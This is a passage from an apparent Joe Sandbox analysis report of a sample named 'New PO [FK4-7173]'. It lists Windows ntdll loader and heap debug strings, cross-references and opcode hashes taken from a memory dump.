                                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 011A219F
                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 011A2178
                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 011A2180
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                          Strings
                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 011A8181, 011A81F5
                                                                          • LdrpInitializeProcess, xrefs: 0116C6C4
                                                                          • LdrpInitializeImportRedirection, xrefs: 011A8177, 011A81EB
                                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 011A81E5
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0116C6C3
                                                                          • Loading import redirection DLL: '%wZ', xrefs: 011A8170
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                          APIs
                                                                            • Part of subcall function 01172DF0: LdrInitializeThunk.NTDLL ref: 01172DFA
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01170BA3
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01170BB6
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01170D60
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01170D74
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                          • String ID:
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                          Strings
                                                                          • LdrpInitializeProcess, xrefs: 01168422
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01168421
                                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0116855E
                                                                          • @, xrefs: 01168591
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                          Strings
                                                                          • SXS: %s() passed the empty activation context, xrefs: 011A21DE
                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011A22B6
                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011A21D9, 011A22B1
                                                                          • .Local, xrefs: 011628D8
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                          Strings
                                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01190FE5
                                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0119106B
                                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011910AE
                                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01191028
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                          Strings
                                                                          • LdrpDynamicShimModule, xrefs: 0119A998
                                                                          • apphelp.dll, xrefs: 01152462
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0119A9A2
                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0119A992
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-176724104
                                                                          Strings
                                                                          • HEAP: , xrefs: 01143264
                                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0114327D
                                                                          • HEAP[%wZ]: , xrefs: 01143255
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                          • API String ID: 0-617086771
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-4253913091
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $@
                                                                          • API String ID: 0-1077428164
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                          • API String ID: 0-2779062949
                                                                          Strings
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0119A121
                                                                          • Failed to allocated memory for shimmed module list, xrefs: 0119A10F
                                                                          • LdrpCheckModule, xrefs: 0119A117
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-161242083
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-1334570610
                                                                          Strings
                                                                          • Failed to reallocate the system dirs string !, xrefs: 011A82D7
                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 011A82DE
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 011A82E8
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-1783798831
                                                                          Strings
                                                                          • @, xrefs: 011EC1F1
                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 011EC1C5
                                                                          • PreferredUILanguages, xrefs: 011EC212
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                          • API String ID: 0-2968386058
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                          • API String ID: 0-1373925480
                                                                          Strings
                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 011B4899
                                                                          • LdrpCheckRedirection, xrefs: 011B488F
                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 011B4888
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                          • API String ID: 0-3154609507
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-2558761708
                                                                          Strings
                                                                          • LdrpInitializationFailure, xrefs: 011B20FA
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 011B2104
                                                                          • Process initialization failed with status 0x%08lx, xrefs: 011B20F3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-2986994758
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: #%u
                                                                          • API String ID: 48624451-232158463
                                                                          Strings
                                                                          • LdrResSearchResource Exit, xrefs: 0113AA25
                                                                          • LdrResSearchResource Enter, xrefs: 0113AA13
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                          • API String ID: 0-4066393604
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: `$`
                                                                          • API String ID: 0-197956300
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: Legacy$UEFI
                                                                          • API String ID: 2994545307-634100481
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$MUI
                                                                          • API String ID: 0-17815947
                                                                          Strings
                                                                          • kLsE, xrefs: 01130540
                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0113063D
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                          • API String ID: 0-2547482624
                                                                          Strings
                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 0113A309
                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 0113A2FB
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                          • API String ID: 0-2876891731
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: Cleanup Group$Threadpool!
                                                                          • API String ID: 2994545307-4008356553
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: MUI
                                                                          • API String ID: 0-1339004836
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: GlobalTags
                                                                          • API String ID: 0-1106856819
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .mui
                                                                          • API String ID: 0-1199573805
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: EXT-
                                                                          • API String ID: 0-1948896318
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: BinaryHash
                                                                          • API String ID: 0-2202222882
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: #
                                                                          • API String ID: 0-1885708031
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: BinaryName
                                                                          • API String ID: 0-215506332
                                                                          Strings
                                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 011B895E
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                          • API String ID: 0-702105204
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 563ac1046d8730cf5c542b519a7ae89d1f757610836af79d82e4ab08fe28e074
                                                                          • Instruction ID: 16d33c5d6934a0c46521b3b444b3ab7f0725166376db4d7806ae0cf7b6332bcb
                                                                          • Opcode Fuzzy Hash: 563ac1046d8730cf5c542b519a7ae89d1f757610836af79d82e4ab08fe28e074
                                                                          • Instruction Fuzzy Hash: D4E1AF71608342EFC719CF28C480A6ABBE0FFC9314F05896DE99987355E731EA45CB92
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d750df395bcd44e5a31b5de39f898c3ed6c0e1c8fe1103c5b9e5321619db1532
                                                                          • Instruction ID: dbd3721bd50455911c24647dd2c498ca11f3c21d7f75a9a355a593f6fc4f320c
                                                                          • Opcode Fuzzy Hash: d750df395bcd44e5a31b5de39f898c3ed6c0e1c8fe1103c5b9e5321619db1532
                                                                          • Instruction Fuzzy Hash: CDD1F471A006269BDB1CDF69C890BBA77F5FF54308F15822DE912DB280E734E961CB61
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                          • Instruction ID: 947a9bdf657a187e1d8aa9c805e990e8cdf230e75d53eaaa35f16ca8f9794fab
                                                                          • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                          • Instruction Fuzzy Hash: EDB14F75A00605AFDB28DF99C980AEBBBBDFF84704F14446DEA4297790DB34E905CB10
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                          • Instruction ID: 192e9c881e885f9782851e0a75263cb82085f15f8dc5dacf391148cc6e53deb1
                                                                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                          • Instruction Fuzzy Hash: E9B12731600646AFDF2DDBA9C850BBEBBF6EF48604F190159E6529B381D730ED42CB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 03bdec553cbfbce8b3966feb8f8b56ff95e97ab33e0b54a77ec06208a6655ac6
                                                                          • Instruction ID: 9df9060cfdd2aa749ffc8390552d250640b490d916bfaa5533caf95ab08ac616
                                                                          • Opcode Fuzzy Hash: 03bdec553cbfbce8b3966feb8f8b56ff95e97ab33e0b54a77ec06208a6655ac6
                                                                          • Instruction Fuzzy Hash: 30C15870108381DFEB68CF19C484BAAB7E5BF88304F44496DE99987391D774EA48CF92
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 96a17e04f66587646ee08c76edf54f8ed6a0af3895874b791e650086571e444b
                                                                          • Instruction ID: 2c707d1bc15f9871a0f28d7d05ad5341d135dc27be4f7568d9ecf7cb575f9f31
                                                                          • Opcode Fuzzy Hash: 96a17e04f66587646ee08c76edf54f8ed6a0af3895874b791e650086571e444b
                                                                          • Instruction Fuzzy Hash: 71B15F70B002668BDB78DF58C890BADB7B5AF44704F0485EAD64AE7241EB70DD86CF61
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 10e1a0e23e51752c3e5ad77d63b55b8bc27088572f52b143d61894ab1fd03977
                                                                          • Instruction ID: fef7b9354b996cd8741fb802eb744850d706892d90282f7284800f6c9c500688
                                                                          • Opcode Fuzzy Hash: 10e1a0e23e51752c3e5ad77d63b55b8bc27088572f52b143d61894ab1fd03977
                                                                          • Instruction Fuzzy Hash: 7EA12231E01656EFEF298F98C848FAEBFA4BB04754F054121EE21AB281D7749E41CBD1
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b53a98139f04d39f5993584ce324ff6e35f2c5cfbda9dd9acb0cf95f7e27a725
                                                                          • Instruction ID: e93e26f5dd53c5c31b7b56637747dd4aa84940d38fce6ecaf7667a94348c7b10
                                                                          • Opcode Fuzzy Hash: b53a98139f04d39f5993584ce324ff6e35f2c5cfbda9dd9acb0cf95f7e27a725
                                                                          • Instruction Fuzzy Hash: 7BA1B075B0071A9FDB2DDF69C890BAABBB1FF49318F104129EA0697381DB34A851CB50
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2ef1c169f54f6234377b8bbb45e50d7fc5e2a211da18356de25fc10656552971
                                                                          • Instruction ID: f3fec1641f21d65434f4e1cf12e00fedfc68b46c01f36be48259b6ab9ac5408c
                                                                          • Opcode Fuzzy Hash: 2ef1c169f54f6234377b8bbb45e50d7fc5e2a211da18356de25fc10656552971
                                                                          • Instruction Fuzzy Hash: AEA1C172624252EFC726EF18CD40B6ABBE9FF58704F044A28E6459B692D334ED01CB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                          • Instruction ID: e7bce752c71038997d5846227fa97d5c4a31ef5bed114b5cec08f3a3ad560b53
                                                                          • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                          • Instruction Fuzzy Hash: AAB13C71E1061ADFDF1ACFA9C884AADB7B5FF48310F14826AE914A7395D730AD41CB90
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ca316d37a94a5f99860abe03c10cc705882fee474b2294c6c7c8a49e933cc295
                                                                          • Instruction ID: b6009bee40bad42d514a54e67d325ffaa0e5df3c5586b836fd66ae6678950ff4
                                                                          • Opcode Fuzzy Hash: ca316d37a94a5f99860abe03c10cc705882fee474b2294c6c7c8a49e933cc295
                                                                          • Instruction Fuzzy Hash: E491CF71E04216AFDB19CFA8D8D4BEEBFB5AF58710F154169EA14AB350D734E900CBA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d28caf50beb6d3b1277202c42b133a72b200149036c81f825bf6bd4ad4f50cae
                                                                          • Instruction ID: c15ff707629188ba2370b3ae9545ab31f9de28854754c2b97ebdd5ca1a50d727
                                                                          • Opcode Fuzzy Hash: d28caf50beb6d3b1277202c42b133a72b200149036c81f825bf6bd4ad4f50cae
                                                                          • Instruction Fuzzy Hash: 36910336A0161ADBEB2CDB68C444BBD7BA1FF94B18F094069ED15DF240E738D941CB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                          • Instruction ID: 644d2f317cf8732ac53c67b1b58928882c4ec25c734f3a7d200db8899b623bb3
                                                                          • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                          • Instruction Fuzzy Hash: E5817231A002099FDF1DDF98D490AAEBBB6FF84314F19856DDA1A9B385D738E901CB50
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
